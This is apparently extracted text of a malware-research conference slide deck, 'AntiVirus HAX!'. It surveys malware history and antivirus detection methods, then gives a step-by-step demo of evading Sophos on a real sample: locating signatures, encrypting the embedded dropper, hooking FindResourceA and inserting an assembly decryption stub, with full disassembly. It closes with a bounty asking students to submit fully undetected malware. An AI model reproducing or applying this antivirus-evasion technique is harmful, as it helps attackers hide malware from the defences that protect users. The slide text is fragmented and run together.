AntiVirus HAX! - bluekaizen.org file [email protected] AntiVirus HAX! Presented by Ehab Hussein Synapse Malware research team : Sofiane Talmat (Algeria)

http://www.synapse-labs.com [email protected]

AntiVirus HAX!Presented by Ehab Hussein

Synapse Malware research team :Sofiane Talmat (Algeria)Ehab Hussein (Egypt)SaadTalaat (Egypt)Amr Thabet (Egypt)


Synapse Intro

History

AV Detection Techniques

Bypassing Sophos :) Demo

Student Bounty Challenge $$$


Solution

Development

Security

Services

Corporate Services

Trainings


Viruses don't harm, ignorance does!

« The Evolution of malware within the last ten years is described by the evolution of people who develop that » (Eugene kaspersky)



– 1948 – 1966 (First theroical Approach)

John von Neumann « Theory of self-reproducing automata »


– 1971 (First Worm)Robert (Bob) H. Thomas (BBN technologies)

"I'm the creeper, catch me if you can!"Machine : PDP-10System : TENEXTransport : ARPANETwas the world's first operational packet switching network and the core network of a set that came to compose the global Internet. Funded by Darpa


WORM


TROJAN HORSE


– 1974/1975 (First Trojan Virus)

John Walker « ANIMAL » UNIVAC 1108


– 1982/1982 (First microcomputer Virus)

Rich Skrenta « Elk Cloner »

Apple II Boot Sector


BOOT SECTOR


– 1986 (First IBM-PC Virus)Basit & Amjad Farooq Alvi

« Brain Boot Sector » « Pakistan Flu » « Lahore »


– 1986 (First File Infector Virus)

Ralf Burger « Virdem model».com

VirDem Ver.: 1.06 (Generation #) aktive. Copyright by R.Burger 1986,1987 Phone.: D - 05932/5451 This is a demoprogram for computerviruses. Please put in a number now. If you're right, you'll be able to continue. The number is between 0 and x


COM INFECTION


1987 (Destructive Virus)Vienna / Lehigh / Yale / Stoned / Ping Pong

Cascade (self-encrypting file virus)IBM Antivirus


1987Jerusalem

« Infecting .EXE »InterruptFriday 13th

1808(EXE)1813(COM)ArabStarBlackBoxBlackWindowFriday13th HebrewUniversityIsraeliPLORussian


EXE Infection


1988 (First Internet Worm)Robert Tappan Morris

« The Morris worm » Buffer Overflow 6000 infections


BUFFER OVERFLOW


1988 (First Multipartite Virus)Ghostball

EXE/COM/Boot Sector


Multipartite virusA multipartite virus is a computer virus that infects and spreads in multiple ways. The term was coined

to describe the first viruses that included DOS executable files and PC BIOS boot sector virus code,

where both parts are viral themselves. For a complete cleanup, all parts of the virus must be removed.


1988 (First Polymorphic Virus)Mark Washburn & Ralf Burger

« the Chameleon family » « Vienna and Cascade »

1260


Polymorphism


1995 (First Macro Virus)« Concept »

Sub MAINREM That's enough to prove my pointEnd Sub


Macro VirusMacro is a language built into a software application such as a word processor. Since some applications

(notably, but not exclusively, the parts of Microsoft Office) allow macro programs to be embedded in documents, so that the programs may be run automatically when the document is opened


1998Chen Ing HauCIH v1

« Chernobyl / Spacefiller »

overwriting critical information on infected system drives, and more importantly, in some cases corrupting the system BIOS.


1999 (Year of the worms)

Jan 20: Happy99 worm (emails) (Spanska)

March 26: Melissa worm (Microsoft Word/ Outlook)

June 06: ExploreZip worm(Microsoft Office documents)

December 30: Kak worm (Javascript worm / Outlook Express bug)

http://en.wikipedia.org/wiki/Happy99

http://en.wikipedia.org/wiki/Melissa_(computer_worm)

http://en.wikipedia.org/wiki/Microsoft_Office_Word

http://en.wikipedia.org/wiki/Microsoft_Office_Outlook

http://en.wikipedia.org/wiki/ExploreZip

http://en.wikipedia.org/wiki/Microsoft_Office

http://en.wikipedia.org/wiki/Kak_worm

http://en.wikipedia.org/wiki/Kak_worm


2000 (The most damaging worm ever) « ILOVEYOU worm (VBS/Loveletter) »

VBScript


2000 (The year of Exploits)

Mai : Sadmind worm (Sun Solaris / Microsoft IIS)

Juillet : Code Red worm (Microsoft IIS indexing)

Septembre : Nimda worm (Windows/Code Red / Sadmind)

Octobre : Klez worm (MS IE / MS Outlook / Outlook Express)


2002 (Metamorphic virus)Mental Driller

« Win32/Simile » (Etap / MetaPHOR)90% metamorphoseMay 14 / System locale


METAMORPHIC VIRUS

metamorphic code is code that can reprogram itself. Often, it does this by translating its own code into a temporary representation,

editing the temporary representation of itself, and then writing itself back to normal code again. This procedure is done with the virus

itself, and thus also the metamorphic engine itself undergoes changes. This is used by some viruses when they are about to infect new files, and the result is that the "children" will never look like their

"parents".


2002/2003 (Rise of the RAT & Trojans)a RAT, or remote access trojan (sometimes remote administration tool) is a program that listens for and accepts connections from a remote 3rd party and carries out the commands that 3rd party gives it...

Beast (Delphi)

Optix Pro

Graybird

ProRat


2004 (First Webworm)« Santy »

- Target : phpbb forums- 40 000 sites infections


2006 (First ever Mac OS X virus)« OSX/Leap-A or OSX/Oompa-A »

Lan worm

Bonjour Protocol (iChat buddy list)


2007 « ZEUS » (drive-by downloads /phishing)

June 2009 : 74,000 FTP

3.6 million infections in USA

28 Oct.2009 : 1.5 million messages phishing on facebook

14/15 Nov. 2009 : 9 million emails infected(Verizon Wireless)

Credits cards of 15 banks compromised

1 Oct.2010 : FBI / 70 millions $ and 90 arrests

May.2011 : source code release


2007 (Mise a pirx : 250 000 $)« Conflicker »

NetBIOS Exploits MS08-067


BOTNET


Cyber Weapons !!!!!

2010 : STUXNETDestructive (targets industrial systems)

2011 : DuquNON Destructive (targets industrial systems to gather

information that could be useful in attacking)


AntiViruses


Possibly the first publicly documented removal of a computer virus in the wild was performed

by Bernd Fix in 1987Enough Said...


Detections


Signature Based Detection


Behaviour Based Detection


Normalization


What About rootkits

Signature-Based File Integrity Monitoring (ex: Tripwire)

Hooking Detection Network-Based Detection

Heuristics-Based Detection


Lets Bypass ThatAV #Demo


1- Locate the signature :

in our case we have :

A- the signature turko0x00003F87 0x000000050x00004343 0x000000050x000044EF 0x000000050x0002E754 0x000000050x0002E76C 0x000000050x0002E78F 0x00000005


B- the Starting of the MZ file to be droppedthe MZ signature starts from 37D64 : MZP

before the MZP there is another signature in unicode starting at 37D1Ait starts the unicode string DENAME


2- Patching the signature :

A- the signature turkoAll what we can do is change some chars to capital letters (playing with case) for all the patterns found

B- we need to encrypt the signature starting from 37D1A (43F11A in debugger)

from Hexworkshop we load the exe and we go to the address 37D1A (43F11A in debugger)

we select from there till the end of the file (approx 0xBC6E bytes)

we go to tools/operations and we make some encryption for example :

Add 20Xor 27


now back to debugger, we load the exe then we go to DATA section at address 43F11A :

we select the following part :0043F11A 44 00 45 00 4E 00 45 00 D.E.N.E.0043F122 4D 00 45 00 06 00 44 00 M.E..D.0043F12A 56 00 43 00 4C 00 41 00 V.C.L.A.0043F132 4C 00 03 00 45 00 44 00 L..E.D.0043F13A 54 00 0B 00 50 00 41 00 T..P.A.0043F142 43 00 4B 00 41 00 47 00 C.K.A.G.0043F14A 45 00 49 00 4E 00 46 00 E.I.N.F.0043F152 4F 00 07 00 52 00 4F 00 O..R.O.0043F15A 4F 00 54 00 4B 00 49 00 O.T.K.I.0043F162 54 00 4D 5A 50 T.MZP

we put a breakpoint on memory on access

We run the exe, the breakpoint will be hit at the following instruction :

7C9350C0 0FB706 MOVZX EAX,WORD PTR DS:[ESI]


we can see it's in NTDLL.DLL, we look into the stack and we search for the return address to our binary so we locate the original call addreswe find the following in the stack :

0012FF00 |00403EC9 É>@. RETURN to unpacked.00403EC9 from <JMP.&KERNEL32.FindResourceA>0012FF04 |00400000 ..@. ASCII "MZP"0012FF08 |00403F68 h?@. ASCII "EDT"0012FF0C |0000000A ....0012FF10 |0012FF3C <ÿ. Pointer to next SEH record


we go to the address 00403EC9 and we find the following instruction :

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA00403EC9 |. 8BF0 MOV ESI,EAX00403ECB |. 85F6 TEST ESI,ESI00403ECD |. 74 6B JE SHORT unpacked.00403F3A


we take the instruction that come before the return address

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA

we will take the that address and instruction and save them.


Next step we go at the end of the exe lets say addres 004307A2 and we write our decryption function

004307A2 > 60 PUSHAD004307A3 . 9C PUSHFD004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A004307A9 . B9 E6BC0000 MOV ECX,0BCE6004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; |004307B0 . 80F3 27 XOR BL,27 ; |004307B3 . 80EB 20 SUB BL,20 ; |004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; |004307B8 . 47 INC EDI ; |004307B9 .Ê2 F3 LOOPD SHORT Copy_of_.004307AE ; |004307BB . 9D POPFD ; |004307BC . 61 POPAD ; |


Now we will change the instruction :

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA (CALL 00403778)

by the following

00403EC4 . E9 D9C80200 JMP Copy_of_.004307A2 ; (JMP 004307A2)

so we can jump to our decryption function


add the overwritten function and a jmp back to our decryption function like following :

004307A2 > 60 PUSHAD004307A3 . 9C PUSHFD004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A004307A9 . B9 E6BC0000 MOV ECX,0BCE6004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; |004307B0 . 80F3 27 XOR BL,27 ; |004307B3 . 80EB 20 SUB BL,20 ; |004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; |004307B8 . 47 INC EDI ; |004307B9 .Ê2 F3 LOOPD SHORT Copy_of_.004307AE ; |004307BB . 9D POPFD ; |004307BC . 61 POPAD ; |004307BD . E8 B62FFDFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA004307C2 .Ê9 0237FDFF JMP Copy_of_.00403EC9

Last step is to mark our memory location at 0043F11A as Writeable so we can decrypt the data there and we do it with PE Explorer for example


Bounty challenge50$ discount on any synapse course & Recognition on synapse-labs facebook

To the student that will send usFully undetected malware using

Our same technique from the demo


Thank youFacebook.com/Synapse.Labs

Twitter : @Synapse_Labs

My Twitter: @__Obzy__My FaceBook: www.facebook.com/Obzysynapse

Documents

AntiVirus HAX! - bluekaizen.org file [email protected] AntiVirus HAX! Presented by Ehab Hussein Synapse Malware research team : Sofiane Talmat (Algeria)